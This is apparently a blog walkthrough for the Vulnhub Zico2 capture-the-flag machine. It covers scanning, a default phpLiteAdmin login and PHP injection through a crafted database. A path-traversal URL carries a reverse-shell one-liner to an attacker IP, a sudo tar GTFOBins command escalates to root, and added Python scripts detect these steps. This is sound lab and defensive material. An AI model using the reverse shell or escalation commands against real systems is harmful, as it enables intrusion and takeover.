In this post, I will share how to clear the Zico2 machine from Vulnhub.
We need to find the assigned IP address first, so let's do a ping sweep to find it.
for i in {1..254} ;do (ping -c 1 192.168.11.$i | grep "bytes from" &) ;done
You may get a different IP address from the one I found.
Port scanning
With the IP address confirmed, I scanned the default port range with service detection to see what was running.
nmap -sC -sV 192.168.11.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 09:25 JST
Nmap scan report for 192.168.11.143
Host is up (0.0023s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37434/udp6 status
| 100024 1 50232/tcp6 status
| 100024 1 55865/tcp status
|_ 100024 1 59117/udp status
OK, three ports are open.
I inspected the web server first.
Since there wasn’t any useful information on the default page, I enumerated directories to see if there were any important ones.
Directory enumeration
I used gobuster.
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 291]
/.hta (Status: 403) [Size: 286]
/.htpasswd (Status: 403) [Size: 291]
/cgi-bin/ (Status: 403) [Size: 290]
/css (Status: 301) [Size: 314] [--> http://192.168.11.143/css/]
/dbadmin (Status: 301) [Size: 318] [--> http://192.168.11.143/dbadmin/]
/img (Status: 301) [Size: 314] [--> http://192.168.11.143/img/]
/index.html (Status: 200) [Size: 7970]
/index (Status: 200) [Size: 7970]
/js (Status: 301) [Size: 313] [--> http://192.168.11.143/js/]
/LICENSE (Status: 200) [Size: 1094]
/package (Status: 200) [Size: 789]
/server-status (Status: 403) [Size: 295]
/tools (Status: 200) [Size: 8355]
/vendor (Status: 301) [Size: 317] [--> http://192.168.11.143/vendor/]
/view (Status: 200) [Size: 0]
It found many directories.
The one called dbadmin looks interesting, so I opened it.
A login page appeared.
It requires a password, so I searched for whether phpLiteAdmin has default credentials.
The search results said the default password is "admin".
I managed to log in and could see some interesting information.
There were two credentials, for root and zico.
The passwords appear to be MD5 hashes. I cracked them and got the following results:
zico2215@ and 34kroot34.
So easy?!
phpLiteAdmin v1.9.3
Everything went smoothly up to the user credentials, but they turned out to be useless.
I tried an SSH connection with them and it didn't work.
I needed to find another way in.
I searched for vulnerabilities in phpLiteAdmin v1.9.3 (the version is displayed on the login page).
I came across a vulnerability that had been used in another CTF challenge.
It lets us get a reverse shell by creating a database whose file contains an arbitrary script.
As shown in the screenshot above, I created a database called hack.php.
In that database, I created a table called try and put the malicious value in the default-value field.
Now I'm ready for the attack. What remains is to request the database file through view.php and execute the command.
Of course, because it goes through the address bar, the command must be URL-encoded.
192.168.11.143/view.php?page=tools.html../../../../..//usr/databases/hack.php&cmd=php+-r+'%24sock%3Dfsockopen("192.168.11.128"%2C4444)%3Bexec("%2Fbin%2Fsh+-i+<%263+>%263+2>%263")%3B';
Then, we are connected!
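From the defender's side, the request chain above leaves a clear trace in the web server log. As an added example (not code from the original post), here is a small Python check over Apache access-log lines that flags a page= value traversing out of the web root, a .php file pulled through page=, and a cmd= parameter; the log lines are constructed, not captured from the VM.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined log format (not captured from the VM).
# The last line mirrors the request shape used in the post: a page= value that
# traverses to the phpLiteAdmin database file, plus a cmd= parameter.
SAMPLE_LOG = """\
192.168.11.128 - - [02/Dec/2024:09:30:01 +0900] "GET /dbadmin/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.11.128 - - [02/Dec/2024:09:32:45 +0900] "GET /view.php?page=tools.html HTTP/1.1" 200 8355 "-" "Mozilla/5.0"
192.168.11.128 - - [02/Dec/2024:09:33:02 +0900] "GET /view.php?page=tools.html../../../../..//usr/databases/hack.php&cmd=id HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
TRAVERSAL = re.compile(r'\.\./|\.\.\\')   # ../ or ..\ after decoding


def analyse_request(target: str) -> list[str]:
    """Return the suspicious indicators found in one request target (path + query)."""
    findings = []
    # parse_qs decodes percent-encoding once; unquote again to catch double encoding.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        decoded = [unquote(v) for v in values]
        if any(TRAVERSAL.search(v) for v in decoded):
            findings.append(f"traversal in {name}")
        if name == "page" and any(v.lower().endswith(".php") for v in decoded):
            findings.append("php file requested via page=")
    if "cmd" in params:
        findings.append("cmd= parameter present")
    return findings


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, request target, findings) for each line worth a look."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        findings = analyse_request(m["target"])
        if findings:
            hits.append((m["ip"], m["target"], findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {target}: {', '.join(findings)}")
```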
User flag
The user of the shell we obtained is www-data.
Let’s check if we can escalate privileges.
-rw-r--r-- 1 zico zico 2831 Jun 19 2017 /home/zico/wordpress/wp-config.php
define('DB_NAME', 'zico');
define('DB_USER', 'zico');
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
define('DB_HOST', 'zico');
I found the password for zico in the WordPress config file.
If you want an easy way to gather this kind of information, I recommend linpeas.
I switched to zico with su and the recovered password.
zico@zico:/tmp$ whoami
whoami
zico
Root flag
We have one more step to go.
To get root permission, I checked the list of sudo commands that zico can use.
zico@zico:~$ sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip
It says tar and zip can be run as root through sudo without a password.
I always check GTFOBins for relevant entries, and it has one for tar.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
I tried the command and successfully became root.
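The root cause here is a sudoers rule that hands a shell-escape-capable binary to an unprivileged user. As an added example (not from the original post), here is a small Python audit that parses the sudo -l output above and flags rules granting ALL or a binary with a known sudo shell escape; the binary list is an assumed subset of GTFOBins entries, not the full list.

```python
import re

# Constructed sample: the sudo -l output from the post, pasted as text for the check.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
"""

# Assumed subset of binaries with a sudo shell escape on GTFOBins; extend as needed.
SHELL_ESCAPE_BINARIES = {"tar", "zip", "vim", "vi", "find", "less", "more", "awk", "env", "python", "perl"}

# Matches "(runas) TAG: TAG: /path/cmd args, /path/other" as printed by sudo -l.
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def parse_sudo_rules(text: str) -> list[dict]:
    """Parse the command-rules section of `sudo -l` output into dicts."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in m["cmds"].split(","):
            rules.append({"runas": m["runas"].strip(), "nopasswd": "NOPASSWD" in tags,
                          "command": cmd.strip()})
    return rules


def risky_rules(rules: list[dict]) -> list[dict]:
    """Rules that run ALL, or a shell-escape-capable binary, as another user."""
    out = []
    for r in rules:
        binary = r["command"].split()[0].rsplit("/", 1)[-1]
        if binary == "ALL" or binary in SHELL_ESCAPE_BINARIES:
            out.append(r)
    return out


if __name__ == "__main__":
    for r in risky_rules(parse_sudo_rules(SUDO_L_OUTPUT)):
        flag = "NOPASSWD " if r["nopasswd"] else ""
        print(f"{flag}{r['command']} as {r['runas']}: shell escape possible, restrict or remove")
```

Restricting tar's arguments in sudoers is not enough on its own, since the --checkpoint-action option used above still runs a command; a wrapper script that sets the arguments itself, or a dedicated backup user, avoids handing out the raw binary.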
flag.txt
# cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#
This is the end of the machine.
I hope you enjoyed it.
Thanks.